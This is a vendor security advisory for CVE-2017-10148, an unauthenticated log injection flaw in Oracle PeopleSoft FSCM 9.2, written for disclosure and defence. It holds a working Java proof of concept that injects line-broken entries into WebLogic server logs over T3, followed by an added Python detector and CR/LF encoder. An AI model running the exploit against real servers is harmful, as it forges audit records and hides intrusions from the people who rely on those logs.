ERPScan advisory ERPSCAN-17-042
Mar 16, 2017

Anonymous log injection in FSCM

2017-03-16 00:00:00
erpscan.io

CVSS3: 5.8 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N

EPSS: 0.003 Low
Percentile: 63.7%

**Application:** Oracle PeopleSoft
**Versions Affected:** PeopleSoft FSCM 9.2
**Vendor:** Oracle
**Bug:** Anonymous log injection
**Reported:** 16.03.2017
**Vendor response:** 17.03.2017
**Date of Public Advisory:** 18.07.2017
**Reference:** Oracle CPU July 2017
**Authors:** Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148

CVSS Information

CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)
C: Impact to Confidentiality None (N)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An unauthenticated attacker can use a crafted T3 request to inject arbitrary data, including line breaks, into the server log files, which allows forging log events and hiding actions on the system.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply Oracle CPU July 2017.

TECHNICAL DESCRIPTION

Proof of Concept

```java
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.rmi.PortableRemoteObject;
import weblogic.common.T3ServicesDef;

// The advisory's original throws clause also listed several WebLogic checked
// exceptions that this body never raises; only NamingException (JNDI) is kept.
static boolean anon_log_injection(String PS_SERVER_IP, String PS_SERVER_PORT) throws NamingException {
    // Unauthenticated JNDI context over T3 to the PeopleSoft WebLogic server
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    // Look up the T3 services stub and narrow it to its remote interface
    Object obj = ctx.lookup("weblogic.common.T3Services");
    Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
    T3ServicesDef h = (T3ServicesDef) o;
    // Each message carries an embedded line break, so its second half lands in the
    // server log as a separate physical line, at every severity level
    h.log().log("ERPScan_1\n\rERPScan_2");
    h.log().info("ERPScan_3\n\rERPScan_4");
    h.log().error("ERPScan_5\n\rERPScan_6");
    h.log().warning("ERPScan_7\n\rERPScan_8");
    h.log().debug("ERPScan_9\n\rERPScan_10");
    return false;
}
```
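Two defender-side checks that follow from the payload shape above, added here as an example and not ERPScan's code or part of the advisory: a scanner that flags physical log lines carrying a bare CR (what a `\n\r` payload leaves behind) or an entry header whose timestamp runs backwards, plus an encoder that neutralizes CR/LF in untrusted text before it reaches a logger. The log excerpt is constructed in the WebLogic server-log layout; its host, server and thread names are assumptions.

```python
import re
from datetime import datetime

# Constructed excerpt in the WebLogic server-log layout (not a real capture). Entry 2
# carries the advisory's payload shape, text + "\n\r" + text, so its tail lands on its
# own physical line starting with a bare CR; entry 3 is a forged header with a stale time.
SAMPLE_LOG = (
    "####<Mar 16, 2017 12:00:01 AM UTC> <Info> <Security> <psft01> <PIA> <main> "
    "<<WLS Kernel>> <> <> <1489622401000> <BEA-090082> <Security initializing>\n"
    "####<Mar 16, 2017 12:00:05 AM UTC> <Info> <Common> <psft01> <PIA> <t3-1> "
    "<<anonymous>> <> <> <1489622405000> <BEA-000000> <ERPScan_1\n"
    "\rERPScan_2>\n"
    "####<Mar 15, 2017 11:59:00 PM UTC> <Info> <Security> <psft01> <PIA> <t3-1> "
    "<<admin>> <> <> <1489622340000> <BEA-000000> <forged: admin logged in>\n"
    "####<Mar 16, 2017 12:00:09 AM UTC> <Warning> <JDBC> <psft01> <PIA> <pool-2> "
    "<<WLS Kernel>> <> <> <1489622409000> <BEA-001129> <Connection test failed\n"
    "  at weblogic.jdbc.common.internal.ConnectionEnv.test>\n"
)

HEADER_RE = re.compile(r"^####<([A-Z][a-z]{2} \d{1,2}, \d{4} \d{1,2}:\d{2}:\d{2} [AP]M) [A-Z]+>")
TS_FMT = "%b %d, %Y %I:%M:%S %p"


def scan_log(text):
    """Return (line_no, reason) pairs for physical lines that look injected.

    A CR that is not a CRLF terminator is the residue of a "\\n\\r" payload; a header
    whose timestamp precedes the newest one seen is typical of a forged entry, since
    the attacker chooses the time. Genuine multi-line entries (stack traces) trip neither.
    """
    findings = []
    last_ts = None
    for no, line in enumerate(text.split("\n"), start=1):
        if "\r" in line.rstrip("\r"):
            findings.append((no, "stray-cr"))
        m = HEADER_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), TS_FMT)
            if last_ts is not None and ts < last_ts:
                findings.append((no, "timestamp-regression"))
            else:
                last_ts = ts
    return findings


def neutralize(msg):
    """Application-side control: encode CR/LF in untrusted text before logging it."""
    return msg.replace("\r", "\\r").replace("\n", "\\n")
```

Read real log files with `open(path, newline="")` so that Python does not translate the carriage returns the first check relies on.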
